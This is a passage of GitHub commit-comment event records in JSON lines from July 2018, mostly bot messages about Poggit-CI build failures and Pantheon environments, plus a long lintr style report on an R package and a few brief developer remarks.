GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-13T21:43:26Z"}
{"id":"7964490185","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29705768,"position":null,"line":null,"path":null,"commit_id":"83bd7dafb6ee959159b2e6f954d9666887790135","created_at":"2018-07-13T21:43:28Z","updated_at":"2018-07-13T21:43:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-791](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-791).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-791-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-13T21:43:28Z"}
{"id":"7964493541","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"mongodb-js/mongodb-core"},"payload":{"comment":{"id":29705776,"position":null,"line":null,"path":null,"commit_id":"d95a4d15eea9455dff3feea38784bbaed338488d","created_at":"2018-07-13T21:44:28Z","updated_at":"2018-07-13T21:44:28Z","author_association":"MEMBER","body":"Primarily for custom schema types, re: https://github.com/Automattic/mongoose/issues/4356 and http://mongoosejs.com/docs/customschematypes.html ."}},"created_at":"2018-07-13T21:44:28Z"}
{"id":"7964494070","type":"CommitCommentEvent","actor":{"login":"naggie"},"repo":{"name":"naggie/sd01"},"payload":{"comment":{"id":29705779,"position":null,"line":null,"path":null,"commit_id":"77b7ec831dfbf79de2c1325bca738adb3669ccbb","created_at":"2018-07-13T21:44:37Z","updated_at":"2018-07-13T21:44:37Z","author_association":"OWNER","body":"It's a shame go doesn't have log level filters. Perhaps it should be a flag, or maybe use the standard logging module so it can be directed to a file.\r\n\r\nI could alternatively\r\n* move it to dspa, or\r\n* make it respond to SIGUSR1\r\n* do a DSPA GRPC call to list peers\r\n\r\nWhat do you think? Is it worth using a logging lib? I don't think so as this is a library...\r\n\r\n\r\nHappy for you to remove it nonetheless, or make it optional."}},"created_at":"2018-07-13T21:44:37Z"}
{"id":"7964495264","type":"CommitCommentEvent","actor":{"login":"kaj"},"repo":{"name":"kaj/rust-pdf"},"payload":{"comment":{"id":29705782,"position":null,"line":null,"path":null,"commit_id":"435609621b76067ada7ec3fa35d4f624ac5d1786","created_at":"2018-07-13T21:44:59Z","updated_at":"2018-07-13T21:44:59Z","author_association":"OWNER","body":"Yes, there is.  Thanks for pointing it out!"}},"created_at":"2018-07-13T21:44:59Z"}
{"id":"7964495592","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29705784,"position":null,"line":null,"path":null,"commit_id":"28284fcee730cf6474b4d0262b2e5c0dac8ee5fa","created_at":"2018-07-13T21:45:07Z","updated_at":"2018-07-13T21:45:07Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-68](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-68).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-68-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-13T21:45:07Z"}
{"id":"7964496045","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/CloudSigns"},"payload":{"comment":{"id":29705785,"position":null,"line":null,"path":null,"commit_id":"a61ce8f10eb06817511bba173db04b853d492dcd","created_at":"2018-07-13T21:45:14Z","updated_at":"2018-07-13T21:45:14Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ByxNilsGFX/CloudSigns/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `05b5b6a0-86e6-11e8-8d35-5818d9ed5e85`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-13T21:45:14Z"}
{"id":"7964496437","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/CloudSigns"},"payload":{"comment":{"id":29705788,"position":null,"line":null,"path":null,"commit_id":"12fca5e619aeb7b5b8e4b071347d8f47eb4dc9e5","created_at":"2018-07-13T21:45:21Z","updated_at":"2018-07-13T21:45:21Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ByxNilsGFX/CloudSigns/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `09d3e112-86e6-11e8-8bee-b38685e28912`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-13T21:45:21Z"}
{"id":"7964499552","type":"CommitCommentEvent","actor":{"login":"HenryLeongStat"},"repo":{"name":"vatlab/sos-ruby"},"payload":{"comment":{"id":29705791,"position":null,"line":null,"path":null,"commit_id":"7179879ddede17decdc8035db3bee48e952a3408","created_at":"2018-07-13T21:46:13Z","updated_at":"2018-07-13T21:46:13Z","author_association":"MEMBER","body":"#3 "}},"created_at":"2018-07-13T21:46:13Z"}
{"id":"7964499866","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29705792,"position":3,"line":3,"path":"eleventhLesson/scriptHW11.js","commit_id":"31099ebb168aa8f8d7a0a217f960e53f25ed79a2","created_at":"2018-07-13T21:46:19Z","updated_at":"2018-07-13T21:46:19Z","author_association":"NONE","body":"скобки не обязательно, т.к. только одно выражение "}},"created_at":"2018-07-13T21:46:19Z"}
{"id":"7964500293","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"barrenWuffet/convPkg"},"payload":{"comment":{"id":29705793,"position":null,"line":null,"path":null,"commit_id":"a53aeef496773362491ee2c273615b7e37209000","created_at":"2018-07-13T21:46:25Z","updated_at":"2018-07-13T21:46:25Z","author_association":"NONE","body":"[R/cat_names.R:5:18:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                 ^\n```\n[R/cat_names.R:5:32:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                               ^\n```\n[R/cat_names.R:5:32:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L5) *style:* **Only use double-quotes.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                               ^~~~\n```\n[R/cat_names.R:5:44:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L5) *style:* **Only use double-quotes.**\n```r\n​  cat(paste(\",'\",names(x), \"'\",'\\n', sep = ''))\n                                           ^~\n```\n[R/cat_names.R:7:1:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L7) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/cat_names.R:8:1:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L8) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/cat_names.R:9:1:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cat_names.R#L9) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/clusDropVar2.R:21:13:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L21) *style:* **Commas should never have a space before.**\n```r\n​  vte = c() ,\n           ~^\n```\n[R/clusDropVar2.R:41:29:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L41) *style:* **Commas should always have a space after.**\n```r\n​        ddm1 <- dudi.mix(x[,vtu1[-i]], add.square = FALSE, scannf = F, nf = ncol(x))\n                            ^\n```\n[R/clusDropVar2.R:51:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L51) *style:* **Commas should always have a space after.**\n```r\n​          pam1 <- clara(ddm1$li[,1:length(ddm1$eig[ddm1$eig > 1])], k = j, samples = 50)\n                                 ^\n```\n[R/clusDropVar2.R:57:44:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                           ^\n```\n[R/clusDropVar2.R:57:46:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                             ^\n```\n[R/clusDropVar2.R:57:57:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                                        ^\n```\n[R/clusDropVar2.R:57:74:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L57) *style:* **Commas should always have a space after.**\n```r\n​            print(paste(\"i: \", i, \" | k: \",j,\" | sil: \",sil1, \" | var: \",vtu1[i], sep = \"\"));flush.console()\n                                                                         ^\n```\n[R/clusDropVar2.R:71:109:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L71) *style:* **Commas should always have a space after.**\n```r\n​      print(paste(\"Dropping var: \", varToDrop, \" | Best Score : \", max(scores1Df$score), \" | vtu1 length: \",length(vtu1) , sep = \"\"));flush.console()\n                                                                                                            ^\n```\n[R/clusDropVar2.R:71:122:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/clusDropVar2.R#L71) *style:* **Commas should never have a space before.**\n```r\n​      print(paste(\"Dropping var: \", varToDrop, \" | Best Score : \", max(scores1Df$score), \" | vtu1 length: \",length(vtu1) , sep = \"\"));flush.console()\n                                                                                                                        ~^\n```\n[R/cnn.R:13:19:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cnn.R#L13) *style:* **Commas should always have a space after.**\n```r\n​    print(paste(i,\": \", colnames(dataset)[i], \" | \", class(dataset[,i]), sep=\"\"))\n                  ^\n```\n[R/cnn.R:13:69:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cnn.R#L13) *style:* **Commas should always have a space after.**\n```r\n​    print(paste(i,\": \", colnames(dataset)[i], \" | \", class(dataset[,i]), sep=\"\"))\n                                                                    ^\n```\n[R/cnn.R:13:77:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/cnn.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​    print(paste(i,\": \", colnames(dataset)[i], \" | \", class(dataset[,i]), sep=\"\"))\n                                                                           ~^~\n```\n[R/hiFreqFact.R:13:27:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/hiFreqFact.R#L13) *style:* **Commas should always have a space after.**\n```r\n​  rt1 <- rt1[rt1$Freq > y,]\n                          ^\n```\n[R/hiFreqFact.R:14:32:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/hiFreqFact.R#L14) *style:* **Only use double-quotes.**\n```r\n​  x <- ifelse(x %in% rt1$x, x, 'other')\n                               ^~~~~~~\n```\n[R/ls.objects.R:26:49:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/ls.objects.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​    out <- out[order(out[[order.by]], decreasing=decreasing), ]\n                                               ~^~\n```\n[R/lsos.R:18:26:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                        ~^~\n```\n[R/lsos.R:18:45:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                                           ~^~\n```\n[R/lsos.R:18:56:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                                                      ~^~\n```\n[R/lsos.R:18:64:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/lsos.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​  lsObjects(..., order.by=\"Size\", decreasing=TRUE, head=TRUE, n=n)\n                                                              ~^~\n```\n[R/naHandler.R:31:1:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/naHandler.R#L31) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/profileDat.R:11:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L11) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df <- data.frame(row_num = 1:ncol(x), col_name = names(x))\n  ^~~~~~\n```\n[R/profileDat.R:12:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L12) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$row_cnt <- nrow(x)\n  ^~~~~~\n```\n[R/profileDat.R:12:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L12) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$row_cnt <- nrow(x)\n         ^~~~~~~\n```\n[R/profileDat.R:14:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L14) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$uniq_val <- sapply(x, function(x) length(unique(x)))\n  ^~~~~~\n```\n[R/profileDat.R:14:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L14) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$uniq_val <- sapply(x, function(x) length(unique(x)))\n         ^~~~~~~~\n```\n[R/profileDat.R:16:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L16) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_cnt <- sapply(x, function(x) sum(is.na(x)))\n  ^~~~~~\n```\n[R/profileDat.R:16:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L16) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_cnt <- sapply(x, function(x) sum(is.na(x)))\n         ^~~~~~\n```\n[R/profileDat.R:18:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L18) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_cnt <- sapply(x, function(x) length(x[!is.na(x) & as.character(x) == '']))\n  ^~~~~~\n```\n[R/profileDat.R:18:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L18) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_cnt <- sapply(x, function(x) length(x[!is.na(x) & as.character(x) == '']))\n         ^~~~~~~~~\n```\n[R/profileDat.R:18:85:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L18) *style:* **Only use double-quotes.**\n```r\n​  pro_df$blank_cnt <- sapply(x, function(x) length(x[!is.na(x) & as.character(x) == '']))\n                                                                                    ^~\n```\n[R/profileDat.R:19:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L19) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n  ^~~~~~\n```\n[R/profileDat.R:19:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L19) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n         ^~~~~~~\n```\n[R/profileDat.R:19:56:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L19) *style:* **Commas should always have a space after.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n                                                       ^\n```\n[R/profileDat.R:19:56:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L19) *style:* **Only use double-quotes.**\n```r\n​  pro_df$top_val <- sapply(x, function(x) rankTab(x)[1,'x'])\n                                                       ^~~\n```\n[R/profileDat.R:21:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n  ^~~~~~\n```\n[R/profileDat.R:21:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n         ^~~~~~\n```\n[R/profileDat.R:21:26:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                         ^~~~~~\n```\n[R/profileDat.R:21:33:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                                ^~~~~~\n```\n[R/profileDat.R:21:42:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                                         ^~~~~~\n```\n[R/profileDat.R:21:49:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L21) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$na_pct <- round(pro_df$na_cnt / pro_df$row_cnt, 4)\n                                                ^~~~~~~\n```\n[R/profileDat.R:22:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n  ^~~~~~\n```\n[R/profileDat.R:22:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n         ^~~~~~~~~\n```\n[R/profileDat.R:22:29:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                            ^~~~~~\n```\n[R/profileDat.R:22:36:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                                   ^~~~~~~~~\n```\n[R/profileDat.R:22:48:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                                               ^~~~~~\n```\n[R/profileDat.R:22:55:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L22) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$blank_pct <- round(pro_df$blank_cnt / pro_df$row_cnt, 4)\n                                                      ^~~~~~~\n```\n[R/profileDat.R:24:3:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L24) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_5_val_pct <- round(sapply(x, function(x) sum(sum(rankTab(x)[1:5, \"Freq\"], na.rm = TRUE)) / length(x)), 4)\n  ^~~~~~\n```\n[R/profileDat.R:24:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L24) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_5_val_pct <- round(sapply(x, function(x) sum(sum(rankTab(x)[1:5, \"Freq\"], na.rm = TRUE)) / length(x)), 4)\n         ^~~~~~~~~~~~~\n```\n[R/profileDat.R:27:10:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/profileDat.R#L27) *style:* **Variable and function names should not use underscores.**\n```r\n​  return(pro_df)\n         ^~~~~~\n```\n[R/rankTab.R:12:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/rankTab.R#L12) *style:* **Commas should always have a space after.**\n```r\n​  tab1 <- tab1[order(-tab1$Freq),]\n                                 ^\n```\n[R/setTypes.R:15:39:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L15) *style:* **Only use double-quotes.**\n```r\n​    df1 <- data.frame(var = i, type = '', stringsAsFactors = F)\n                                      ^~\n```\n[R/setTypes.R:17:30:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L17) *style:* **Commas should always have a space after.**\n```r\n​    print(as.character(x[1:5,i]));flush.console()\n                             ^\n```\n[R/setTypes.R:19:11:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L19) *style:* **Commas should always have a space after.**\n```r\n​    df1[1,'type'] <- readline(' Type - f / n / c ?')\n          ^\n```\n[R/setTypes.R:19:11:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L19) *style:* **Only use double-quotes.**\n```r\n​    df1[1,'type'] <- readline(' Type - f / n / c ?')\n          ^~~~~~\n```\n[R/setTypes.R:19:31:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L19) *style:* **Only use double-quotes.**\n```r\n​    df1[1,'type'] <- readline(' Type - f / n / c ?')\n                              ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/setTypes.R:25:30:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L25) *style:* **Only use double-quotes.**\n```r\n​  charVar <- df2[df2$type == 'c','var']\n                             ^~~\n```\n[R/setTypes.R:25:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  charVar <- df2[df2$type == 'c','var']\n                                 ^\n```\n[R/setTypes.R:25:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L25) *style:* **Only use double-quotes.**\n```r\n​  charVar <- df2[df2$type == 'c','var']\n                                 ^~~~~\n```\n[R/setTypes.R:26:29:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L26) *style:* **Only use double-quotes.**\n```r\n​  numVar <- df2[df2$type == 'n','var']\n                            ^~~\n```\n[R/setTypes.R:26:33:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  numVar <- df2[df2$type == 'n','var']\n                                ^\n```\n[R/setTypes.R:26:33:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L26) *style:* **Only use double-quotes.**\n```r\n​  numVar <- df2[df2$type == 'n','var']\n                                ^~~~~\n```\n[R/setTypes.R:27:30:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L27) *style:* **Only use double-quotes.**\n```r\n​  factVar <- df2[df2$type == 'f','var']\n                             ^~~\n```\n[R/setTypes.R:27:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L27) *style:* **Commas should always have a space after.**\n```r\n​  factVar <- df2[df2$type == 'f','var']\n                                 ^\n```\n[R/setTypes.R:27:34:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L27) *style:* **Only use double-quotes.**\n```r\n​  factVar <- df2[df2$type == 'f','var']\n                                 ^~~~~\n```\n[R/setTypes.R:29:6:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L29) *style:* **Commas should always have a space after.**\n```r\n​  x[,charVar] <- as.data.frame(lapply(x[,charVar], as.character))\n     ^\n```\n[R/setTypes.R:29:42:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L29) *style:* **Commas should always have a space after.**\n```r\n​  x[,charVar] <- as.data.frame(lapply(x[,charVar], as.character))\n                                         ^\n```\n[R/setTypes.R:30:6:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L30) *style:* **Commas should always have a space after.**\n```r\n​  x[,numVar] <- as.data.frame(lapply(x[,numVar], function(x) return(as.numeric(as.character(x)))))\n     ^\n```\n[R/setTypes.R:30:41:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L30) *style:* **Commas should always have a space after.**\n```r\n​  x[,numVar] <- as.data.frame(lapply(x[,numVar], function(x) return(as.numeric(as.character(x)))))\n                                        ^\n```\n[R/setTypes.R:31:6:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L31) *style:* **Commas should always have a space after.**\n```r\n​  x[,factVar] <- as.data.frame(lapply(x[,factVar], as.factor))\n     ^\n```\n[R/setTypes.R:31:42:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/R/setTypes.R#L31) *style:* **Commas should always have a space after.**\n```r\n​  x[,factVar] <- as.data.frame(lapply(x[,factVar], as.factor))\n                                         ^\n```\n[tests/testthat/test-clusDropVar2.R:7:81:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-clusDropVar2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- clusDropVar(iris, 3:5, threshold = .6, vte = \"Species\", xLoopsBeforePrint=1)\n                                                                               ~^~\n```\n[tests/testthat/test-lint.R:5:5:](https://github.com/barrenWuffet/convPkg/blob/a53aeef496773362491ee2c273615b7e37209000/tests/testthat/test-lint.R#L5) *style:* **Variable and function names should not use underscores.**\n```r\n​    my_linters <- list(\n    